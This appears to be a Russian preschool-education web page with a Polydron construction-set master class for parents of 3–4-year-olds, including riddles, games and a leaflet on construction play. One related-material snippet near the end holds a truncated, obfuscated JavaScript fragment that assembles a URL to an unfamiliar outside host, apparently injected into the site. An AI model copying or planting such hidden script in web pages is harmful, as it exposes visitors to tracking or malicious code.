Мастер-класс для родителей «Использование конструктора «Полидрон» в образовательной работе с дошкольниками»
материал (младшая группа)
Раскрытие возможностей использования конструктора «Полидрон» с детьми 3-4 лет для развития конструкторских и познавательных способностей.
Скачать:
Вложение | Размер |
---|---|
master_klass_dlya_roditeley.docx | 857 КБ |
Предварительный просмотр:
Мастер-класс для родителей
«Использование конструктора «Полидрон» в образовательной работе с дошкольниками»
Цель: раскрыть возможности использования конструктора «Полидрон» с детьми 3-4 лет для развития конструкторских и познавательных способностей.
Задачи:
- обучать участников мастер-класса навыкам строительства с помощью конструктора «Полидрон»;
- показать участникам мастер-класса возможности использования игр с конструктором «Полидрон»;
- формировать у участников мастер-класса мотивацию на использование конструкторов в самостоятельной деятельности.
Оборудование и материалы: конструктор «Полидрон», интерактивная доска, презентация, картотека схем и образцов построек.
Ход мастер-класса
Воспитатель: Добрый день, уважаемые родители и дети! Сегодня на нашем мастер-классе мы окунемся в мир «Полидрона». Я хотела бы поделиться своим опытом работы по организации детской деятельности с применением конструктора «Полидрон». Но что такое «Полидрон»?
Это такой веселый конструктор «Полидрон-дракон». Давайте его вместе позовем. А вот и он.
Воспитатель выносит «Полидрон», соединенный в цепь (голова и хвост).
Воспитатель (за Дракона): Здравствуйте, взрослые и дети. Я настоящий живой дракон «Полидрон» и пришел я к вам из сказочной страны «Полидронии». У меня есть волшебный хвост, который может трансформироваться и превращаться в различных животных.
- Хотите посмотреть волшебные превращения моего хвоста?
Дети и родители: Да.
Воспитатель: Но для этого мне нужны три помощника. Какая семья поможет мне первой?
На сцену выходит одна или две семьи.
А сейчас мой хвост начинает превращаться, превращаться. Отгадайте в кого?
Ползает наоборот
Задом наперед
Все под водой
Хватает клешней
На слайде картинка рака.
Правильно, рак.
Помощники, соберите рака.
Родители с детьми конструируют.
Схема-помощник
А чтобы нам не было скучно, давайте поиграем со зрителями:
Найдите ваши ушки.
Найдите ваши ножки.
Найдите ваши щечки.
Покажите ладошки.
Покажите кулачки.
А теперь быстрее.
Найдите ваши ушки.
Найдите ваши ножки.
Найдите ваши щечки.
Покажите ладошки.
Покажите кулачки.
Воспитатель: Итак, получился у вас рак? Спасибо. Замечательно.
Воспитатель (за рака): Я рак, не просто так, своими клешнями я все собираю и мамочку свою всегда обнимаю.
А вы дети обнимаете свою мамочку? Покажите как?
Родители обнимаются с детьми.
Воспитатель: А теперь наш рак превратиться в новое животное, но нам нужны помощники. Кто поможет?
Воспитатель вызывает другие две семьи.
Воспитатель: Отгадайте в какое животное превратиться рак:
Кто с рогами и хвостом
Пахнет теплым молоком
Кто мычит, наевшись травки
Возле дома у канавки?
Кто под вечер нам парного
Молока дает?
На слайде картинка: корова.
Воспитатель: Правильно, корова.
Помощники, соберите корову.
Схема подсказка
Родители с детьми конструируют.
А чтобы нам не было скучно, давайте поиграем со зрителями:
Коровушка, коровушка (воспитатель изображает рожки у головы)
Рогатая головушка,
Малых деток не бодай! (раскачивается в стороны)
Молочка им лучше дай!» (два кулачка подносит ко рту)
Воспитатель: Ну, как у нас получилась корова?
Участники мастер класса демонстрируют конструкцию.
Воспитатель: Замечательная корова получилась. Давайте теперь поиграем с коровкой.
Воспитатель: Правила игры таковы: дети становятся в круг. Мы будем вести хоровод, приговаривая: «Коровушка, коровушка, дай нам молока!», а кто-нибудь один из вас будет коровушкой и в это время будет стоять в центре круга с закрытыми глазками и, когда ребята закончат приговаривать, скажет: «Молоко я дам тому, кого я угадать смогу». После этого все заканчивают водить хоровод и на кого из вас я покажу пальчиком, тот попытается изменить голосочек и сказать: «Му-у». Если коровушка отгадает кто это сказал, то коровушкой становится тот, кого отгадали.
Воспитатель играет с детьми.
А пока мы будем играть,
Родителям не дадим скучать.
И попросим их нам замок собрать.
Родители конструируют замок, воспитатель играет с детьми.
Воспитатель: Как родители, у вас замок для нас готов? Да тут и ворота есть.
Мы сейчас с детьми по очереди в замок пройдем и подарок себе найдем.
Дети по цепочке проходят сквозь ворота замка, воспитатель вручает каждому ребенку бумажный цветок.
Воспитатель: Дети, вам понравился наш мастер-класс? Кому понравился, помашите цветочками.
Дети машут.
Воспитатель: А для вас родители мы приготовили памятки о роли конструирования в развитии детей.
Воспитатель раздает памятки.
Уважаемые родители, прошу поделиться своими впечатлениями о нашем мастер-классе.
Высказывания родителей.
А теперь проверим ваше настроение.
Зеленый - понравился мастер-класс.
Желтый - неплохо было.
Красный - ничего не поняли, было сложно.
Родители и дети называют.
Спасибо всем за участие в Мастер-классе!
Приложение
Памятка для родителей
«Роль конструктора в развитии дошкольников»
Благодаря конструированию быстро совершенствуются навыки и умения ребенка, его умственное и эстетическое развитие. У детей с хорошо развитыми навыками в конструировании быстрее развивается речь, так как тонкая моторика связана с центрами речи. Ловкие, точные движения рук дают ребенку возможность в дальнейшем быстрее и лучше овладеть техникой письма.
Основной материал для конструирования - строительный. Дети знакомятся с ним, выясняется отличие деталей, в каком положении он наиболее устойчив: когда стоит вертикально или лежит. Дети усваивают название, пользуются им в игре, учатся различать цвета. Также дети знакомятся со свойствами материала, учатся делать из них различные поделки. Использование в работе конструктора Полидрон развивает умение увидеть в привычных вещах необычное.
Дети учатся сохранять порядок на своем рабочем месте: раскладывают строительный материал на столах в том порядке, в каком показал воспитатель. По окончании занятий и игр разбирают постройку, укладывают материал на столе в том порядке, в каком он находился перед занятием.
Соберите вместе с детьми:
Собачка Верблюд
Велосипед Корова
Ослик Человечек
По теме: методические разработки, презентации и конспекты
Мастер класс «Использование ЛЕГО - конструирования в образовательной работе с дошкольниками»
Мастер -класс...
Мастер-класс для педагогов района «Использование метода песочной терапии в работе с дошкольниками с особыми образовательными потребностями».
Презентация, содержание мастер-класса, описание игр и упражнений в песочнице, на световом столе, с кинетическим песком....
мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"
Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста, формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....
Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"
Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...
Мастер-класс "Использование лего-конструирования в образовательной работе с дошкольниками"
мастер-класс...
МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"
МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...
Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»
В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...